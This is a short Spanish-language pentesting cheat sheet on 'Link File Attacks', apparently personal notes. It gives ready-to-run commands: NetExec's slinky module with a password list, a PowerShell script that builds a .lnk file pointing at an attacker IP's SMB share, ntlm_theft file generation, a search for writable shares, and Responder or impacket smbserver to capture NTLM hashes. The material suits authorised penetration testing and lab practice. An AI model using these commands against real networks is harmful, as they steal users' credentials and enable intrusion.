Saltar a contenido

Link File Attacks

  • Link File Attacks

  • Con NetExec nxc smb 172.16.139.0/24 -u 'pthorpe' -p creds.txt -M slinky -o SERVER=172.16.139.10 NAME=urgent

  • Manual:

    • Código:
    $objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\192.168.138.149\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()
    • smbserver.py -smb2support "icon" .

Con NTLM Theft

  • git clone https://github.com/Greenwolf/ntlm_theft
  • cd ntlm_theft
  • python3 ntlm_theft.py --generate all --server 10.10.14.48 --filename icon
  • impacket-smbclient USER:'PASSWORD'@fIP
    • shares
    • use share con acceso a escritura
  • sudo responder -I tun0 o impacket-smbserver -smb2support shareName someDir